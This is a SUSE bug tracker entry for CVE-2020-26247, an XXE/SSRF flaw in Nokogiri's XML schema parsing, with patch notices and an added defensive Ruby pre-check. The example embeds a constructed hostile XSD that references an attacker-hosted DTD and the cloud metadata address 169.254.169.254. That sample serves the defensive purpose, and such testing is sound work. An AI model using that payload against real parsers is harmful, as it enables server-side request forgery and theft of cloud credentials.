Bugzilla – Bug 1180507
VUL-0: CVE-2020-26247: rubygem-nokogiri: potentially XXE or SSRF attacks by parsed Nokogiri::XML::Schema
Last modified: 2022-10-27 11:41:50 UTC
CVE-2020-26247 Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri before version 1.11.0.rc4 there is an XXE vulnerability. XML Schemas parsed by Nokogiri::XML::Schema are trusted by default, allowing external resources to be accessed over the network, potentially enabling XXE or SSRF attacks. This behavior is counter to the security policy followed by Nokogiri maintainers, which is to treat all input as untrusted by default whenever possible. This is fixed in Nokogiri version 1.11.0.rc4.
References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-26247
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26247
https://github.com/sparklemotion/nokogiri/commit/9c87439d9afa14a365ff13e73adc809cb2c3d97b
https://github.com/sparklemotion/nokogiri/releases/tag/v1.11.0.rc4
https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-vr8q-g5c7-m54m
https://hackerone.com/reports/747489
https://rubygems.org/gems/nokogiri
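An added example, not code from this bug report or from the Nokogiri project, of the check a practitioner can put in front of Nokogiri::XML::Schema while the fixed gem is not yet installed everywhere. It lists every external location an XSD asks the parser to resolve (external DTD entities and the schemaLocation of xs:import, xs:include and xs:redefine) using the stdlib REXML parser, refuses untrusted schemas that point at the network, and passes NONET explicitly when the installed gem has the parse-options argument introduced in 1.11.0.rc4. The sample XSDs are constructed for the example; the refusal policy, the function names and the constant names are the example's own assumptions, not Nokogiri behaviour.

```ruby
# Added example, not code from this bug report or from the Nokogiri project.
# CVE-2020-26247: before Nokogiri 1.11.0.rc4, Nokogiri::XML::Schema parsed an
# XSD with libxml2 allowed to go to the network, so schemaLocation URLs on
# xs:import/xs:include/xs:redefine and external DTD entities inside the XSD
# were fetched (SSRF / XXE). This gate lists those locations with stdlib
# REXML, refuses untrusted schemas that point at the network, and passes
# NONET explicitly when the installed gem accepts parse options.
require "rexml/document"

XSD_NS = "http://www.w3.org/2001/XMLSchema"
# XSD elements whose schemaLocation attribute libxml2 tries to resolve.
LOCATION_ELEMENTS = %w[import include redefine].freeze
# <!ENTITY name SYSTEM "uri">, <!ENTITY name PUBLIC "id" "uri">, and the
# "% name" parameter-entity forms of both.
ENTITY_DECL = /<!ENTITY\s+(?:%\s+)?(\S+)\s+(SYSTEM|PUBLIC)\s+"([^"]*)"(?:\s+"([^"]*)")?/

# True for locations libxml2 would fetch over the network, i.e. what NONET blocks.
def network_location?(location)
  location.match?(%r{\A(https?|ftp)://}i)
end

# Every external reference in the XSD text: DTD external entities (found by
# regex, before any XML parser sees the document) and import/include/redefine
# schemaLocations (found by walking the parsed tree).
def external_references(xsd)
  refs = []
  xsd.scan(ENTITY_DECL) do |name, kind, first, second|
    location = kind == "PUBLIC" ? second : first
    refs << { kind: :entity, name: name, location: location,
              network: network_location?(location) }
  end
  doc = REXML::Document.new(xsd)
  REXML::XPath.each(doc, "//*") do |el|
    next unless el.namespace == XSD_NS && LOCATION_ELEMENTS.include?(el.name)
    location = el.attributes["schemaLocation"]
    next if location.nil?
    refs << { kind: el.name.to_sym, name: el.attributes["namespace"],
              location: location, network: network_location?(location) }
  end
  refs
end

# Policy assumed by this example (not Nokogiri's): an XSD from an untrusted
# source may not name any network location at all. On a vulnerable gem such a
# location would be fetched; on a fixed gem NONET blocks the fetch, but a
# schema that asks for it is still not one we want to trust.
def load_untrusted_schema(xsd)
  net = external_references(xsd).select { |r| r[:network] }
  unless net.empty?
    raise ArgumentError, "refusing schema with network references: " +
                         net.map { |r| r[:location] }.join(", ")
  end
  begin
    require "nokogiri"
  rescue LoadError
    raise "nokogiri is not installed; nothing to validate with"
  end
  parse_options = Nokogiri::XML::ParseOptions
  if parse_options.const_defined?(:DEFAULT_SCHEMA)
    # 1.11.0.rc4 and later: Schema.new takes parse options and DEFAULT_SCHEMA
    # is NONET. Pass it explicitly so the intent survives a later change of
    # default or a switch to Schema.from_document(doc, options).
    Nokogiri::XML::Schema.new(xsd, parse_options.new(parse_options::DEFAULT_SCHEMA))
  else
    # Older gem without the fix: Schema.new takes no options, so the
    # reference check above is the only protection. Upgrade.
    Nokogiri::XML::Schema.new(xsd)
  end
end

# Constructed sample: an XSD that asks the parser to fetch the cloud metadata
# service (SSRF) and an attacker-hosted DTD (XXE), plus one local include.
UNTRUSTED_XSD = <<~XSD
  <?xml version="1.0"?>
  <!DOCTYPE schema [
    <!ENTITY ext SYSTEM "http://attacker.example/evil.dtd">
  ]>
  <schema xmlns="http://www.w3.org/2001/XMLSchema">
    <import namespace="urn:example:addr"
            schemaLocation="http://169.254.169.254/latest/meta-data/"/>
    <include schemaLocation="common-types.xsd"/>
    <element name="order" type="string"/>
  </schema>
XSD

# Constructed sample with nothing external: passes the gate.
CLEAN_XSD = <<~XSD
  <?xml version="1.0"?>
  <schema xmlns="http://www.w3.org/2001/XMLSchema">
    <element name="order" type="string"/>
  </schema>
XSD

if $PROGRAM_NAME == __FILE__
  external_references(UNTRUSTED_XSD).each do |r|
    puts "#{r[:kind]} -> #{r[:location]}#{' (network)' if r[:network]}"
  end
  begin
    load_untrusted_schema(UNTRUSTED_XSD)
  rescue ArgumentError => e
    puts e.message
  end
end
```

The pre-check runs before any libxml2 code touches the input, so it is useful on the backported SUSE packages as well as on an unpatched gem. On a fixed gem the pre-check is defence in depth: NONET already stops the fetch, and network access for trusted schemas has to be requested explicitly through the options argument rather than being the default.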
SUSE-SU-2021:0210-1: An update that fixes two vulnerabilities is now available.
Category: security (important)
Bug References: 1146578,1180507
CVE References: CVE-2019-5477,CVE-2020-26247
JIRA References:
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src): rubygem-nokogiri-1.6.1-5.3.1
SUSE OpenStack Cloud Crowbar 8 (src): rubygem-nokogiri-1.6.1-5.3.1
SUSE OpenStack Cloud 7 (src): rubygem-nokogiri-1.6.1-5.3.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2021:0251-1: An update that solves two vulnerabilities and has one errata is now available.
Category: security (important)
Bug References: 1146578,1156722,1180507
CVE References: CVE-2019-5477,CVE-2020-26247
JIRA References:
Sources used:
SUSE Linux Enterprise High Availability 15-SP2 (src): rubygem-nokogiri-1.8.5-3.6.1
SUSE Linux Enterprise High Availability 15-SP1 (src): rubygem-nokogiri-1.8.5-3.6.1
SUSE Linux Enterprise High Availability 15 (src): rubygem-nokogiri-1.8.5-3.6.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
openSUSE-SU-2021:0237-1: An update that solves two vulnerabilities and has one errata is now available.
Category: security (important)
Bug References: 1146578,1156722,1180507
CVE References: CVE-2019-5477,CVE-2020-26247
JIRA References:
Sources used:
openSUSE Leap 15.2 (src): rubygem-nokogiri-1.8.5-lp152.4.3.1
SUSE-RU-2021:0497-1: An update that solves one vulnerability, contains one feature and has 7 fixes is now available.
Category: recommended (important)
Bug References: 1048688,1149535,1179189,1179955,1180507,1181040,1181379,1181521
CVE References: CVE-2021-3281
JIRA References: SOC-11429
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src): crowbar-core-6.0+git.1611320924.849e748ff-3.34.1, crowbar-openstack-6.0+git.1610402342.21499240d-3.31.1, kibana-4.6.3-4.6.1, openstack-dashboard-14.1.1~dev10-3.21.3, openstack-manila-7.4.2~dev60-4.33.2, openstack-neutron-13.0.8~dev147-3.34.2, openstack-neutron-gbp-12.0.1~dev16-3.22.2, openstack-nova-18.3.1~dev78-3.34.2, python-Django1-1.11.29-3.18.2, release-notes-suse-openstack-cloud-9.20201214-3.27.2, sleshammer-0.9.0-7.6.1
SUSE OpenStack Cloud 9 (src): ardana-db-9.0+git.1611600773.5f1de5f-3.22.1, ardana-horizon-9.0+git.1610491814.38661c2-3.16.1, ardana-logging-9.0+git.1610490922.d5f9813-3.16.1, ardana-monasca-9.0+git.1610547641.d79ecfd-3.22.1, ardana-opsconsole-ui-9.0+git.1611867924.eb82818-4.16.1, ardana-osconfig-9.0+git.1610634027.5934cf8-3.25.1, kibana-4.6.3-4.6.1, openstack-dashboard-14.1.1~dev10-3.21.3, openstack-manila-7.4.2~dev60-4.33.2, openstack-neutron-13.0.8~dev147-3.34.2, openstack-neutron-gbp-12.0.1~dev16-3.22.2, openstack-nova-18.3.1~dev78-3.34.2, python-Django1-1.11.29-3.18.2, release-notes-suse-openstack-cloud-9.20201214-3.27.2, venv-openstack-horizon-14.1.1~dev10-4.25.2, venv-openstack-manila-7.4.2~dev60-3.27.2, venv-openstack-neutron-13.0.8~dev147-6.25.2, venv-openstack-nova-18.3.1~dev78-3.25.2
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2021:2554-1: An update that solves 16 vulnerabilities, contains 10 features and has 8 fixes is now available.
Category: security (moderate)
Bug References: 1019074,1044849,1057496,1073879,1113302,1123064,1143893,1166139,1176784,1179805,1180507,1181277,1181278,1181689,1181828,1182433,1183174,1183803,1184148,1185623,1185836,1186608,1186611,940812
CVE References: CVE-2017-11481,CVE-2017-11499,CVE-2017-5929,CVE-2019-25025,CVE-2020-17516,CVE-2020-26247,CVE-2020-29651,CVE-2021-21238,CVE-2021-21239,CVE-2021-21419,CVE-2021-23336,CVE-2021-27358,CVE-2021-28658,CVE-2021-31542,CVE-2021-33203,CVE-2021-33571
JIRA References: ECO-3105,PM-2352,SCRD-8523,SOC-11422,SOC-11470,SOC-11471,SOC-11521,SOC-11523,SOC-11525,SOC-9876
Sources used:
SUSE OpenStack Cloud Crowbar 8 (src): cassandra-3.11.10-5.3.5, crowbar-core-5.0+git.1622489449.a8e60e238-3.50.4, crowbar-openstack-5.0+git.1616001417.67fd9c2a1-4.52.5, documentation-suse-openstack-cloud-deployment-8.20210512-1.32.5, documentation-suse-openstack-cloud-supplement-8.20210512-1.32.5, documentation-suse-openstack-cloud-upstream-admin-8.20210512-1.32.5, documentation-suse-openstack-cloud-upstream-user-8.20210512-1.32.5, grafana-6.7.4-4.18.2, kibana-4.6.6-3.9.2, openstack-heat-templates-0.0.0+git.1623056900.7917e18-3.21.3, openstack-monasca-installer-20190923_16.32-3.18.2, openstack-nova-16.1.9~dev92-3.48.5, openstack-nova-doc-16.1.9~dev92-3.48.5, python-Django-1.11.29-3.25.3, python-elementpath-1.3.1-1.3.2, python-eventlet-0.20.0-6.3.3, python-py-1.4.34-3.3.3, python-pysaml2-4.0.2-5.9.2, python-xmlschema-1.0.18-1.3.3, rubygem-activerecord-session_store-0.1.2-3.3.2
SUSE OpenStack Cloud 8 (src): ardana-cobbler-8.0+git.1614096566.e8c2b27-3.44.3, cassandra-3.11.10-5.3.5, documentation-suse-openstack-cloud-installation-8.20210512-1.32.5, documentation-suse-openstack-cloud-operations-8.20210512-1.32.5, documentation-suse-openstack-cloud-opsconsole-8.20210512-1.32.5, documentation-suse-openstack-cloud-planning-8.20210512-1.32.5, documentation-suse-openstack-cloud-security-8.20210512-1.32.5, documentation-suse-openstack-cloud-supplement-8.20210512-1.32.5, documentation-suse-openstack-cloud-upstream-admin-8.20210512-1.32.5, documentation-suse-openstack-cloud-upstream-user-8.20210512-1.32.5, documentation-suse-openstack-cloud-user-8.20210512-1.32.5, grafana-6.7.4-4.18.2, kibana-4.6.6-3.9.2, openstack-heat-templates-0.0.0+git.1623056900.7917e18-3.21.3, openstack-monasca-installer-20190923_16.32-3.18.2, openstack-nova-16.1.9~dev92-3.48.5, openstack-nova-doc-16.1.9~dev92-3.48.5, python-Django-1.11.29-3.25.3, python-elementpath-1.3.1-1.3.2, python-eventlet-0.20.0-6.3.3, python-py-1.4.34-3.3.3, python-pysaml2-4.0.2-5.9.2, python-xmlschema-1.0.18-1.3.3, venv-openstack-aodh-5.1.1~dev7-12.32.3, venv-openstack-barbican-5.0.2~dev3-12.33.3, venv-openstack-ceilometer-9.0.8~dev7-12.30.3, venv-openstack-cinder-11.2.3~dev29-14.34.2, venv-openstack-designate-5.0.3~dev7-12.31.3, venv-openstack-freezer-5.0.0.0~xrc2~dev2-10.28.3, venv-openstack-glance-15.0.3~dev3-12.31.3, venv-openstack-heat-9.0.8~dev22-12.33.2, venv-openstack-horizon-12.0.5~dev6-14.36.6, venv-openstack-ironic-9.1.8~dev8-12.33.3, venv-openstack-keystone-12.0.4~dev11-11.35.3, venv-openstack-magnum-5.0.2_5.0.2_5.0.2~dev31-11.32.2, venv-openstack-manila-5.1.1~dev5-12.37.3, venv-openstack-monasca-2.2.2~dev1-11.28.3, venv-openstack-monasca-ceilometer-1.5.1_1.5.1_1.5.1~dev3-8.28.3, venv-openstack-murano-4.0.2~dev2-12.28.3, venv-openstack-neutron-11.0.9~dev69-13.38.3, venv-openstack-nova-16.1.9~dev92-11.36.3, venv-openstack-octavia-1.0.6~dev3-12.33.3, venv-openstack-sahara-7.0.5~dev4-11.32.3, venv-openstack-swift-2.15.2_2.15.2_2.15.2~dev32-11.23.3, venv-openstack-trove-8.0.2~dev2-11.32.3
HPE Helion Openstack 8 (src): ardana-cobbler-8.0+git.1614096566.e8c2b27-3.44.3, cassandra-3.11.10-5.3.5, documentation-hpe-helion-openstack-installation-8.20210512-1.32.5, documentation-hpe-helion-openstack-operations-8.20210512-1.32.5, documentation-hpe-helion-openstack-opsconsole-8.20210512-1.32.5, documentation-hpe-helion-openstack-planning-8.20210512-1.32.5, documentation-hpe-helion-openstack-security-8.20210512-1.32.5, documentation-hpe-helion-openstack-user-8.20210512-1.32.5, grafana-6.7.4-4.18.2, kibana-4.6.6-3.9.2, openstack-heat-templates-0.0.0+git.1623056900.7917e18-3.21.3, openstack-monasca-installer-20190923_16.32-3.18.2, openstack-nova-16.1.9~dev92-3.48.5, openstack-nova-doc-16.1.9~dev92-3.48.5, python-Django-1.11.29-3.25.3, python-elementpath-1.3.1-1.3.2, python-eventlet-0.20.0-6.3.3, python-py-1.4.34-3.3.3, python-pysaml2-4.0.2-5.9.2, python-xmlschema-1.0.18-1.3.3, venv-openstack-aodh-5.1.1~dev7-12.32.3, venv-openstack-barbican-5.0.2~dev3-12.33.3, venv-openstack-ceilometer-9.0.8~dev7-12.30.3, venv-openstack-cinder-11.2.3~dev29-14.34.2, venv-openstack-designate-5.0.3~dev7-12.31.3, venv-openstack-freezer-5.0.0.0~xrc2~dev2-10.28.3, venv-openstack-glance-15.0.3~dev3-12.31.3, venv-openstack-heat-9.0.8~dev22-12.33.2, venv-openstack-horizon-hpe-12.0.5~dev6-14.36.3, venv-openstack-ironic-9.1.8~dev8-12.33.3, venv-openstack-keystone-12.0.4~dev11-11.35.3, venv-openstack-magnum-5.0.2_5.0.2_5.0.2~dev31-11.32.2, venv-openstack-manila-5.1.1~dev5-12.37.3, venv-openstack-monasca-2.2.2~dev1-11.28.3, venv-openstack-monasca-ceilometer-1.5.1_1.5.1_1.5.1~dev3-8.28.3, venv-openstack-murano-4.0.2~dev2-12.28.3, venv-openstack-neutron-11.0.9~dev69-13.38.3, venv-openstack-nova-16.1.9~dev92-11.36.3, venv-openstack-octavia-1.0.6~dev3-12.33.3, venv-openstack-sahara-7.0.5~dev4-11.32.3, venv-openstack-swift-2.15.2_2.15.2_2.15.2~dev32-11.23.3, venv-openstack-trove-8.0.2~dev2-11.32.3
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
fixed in 002-CVE-2020-26247.patch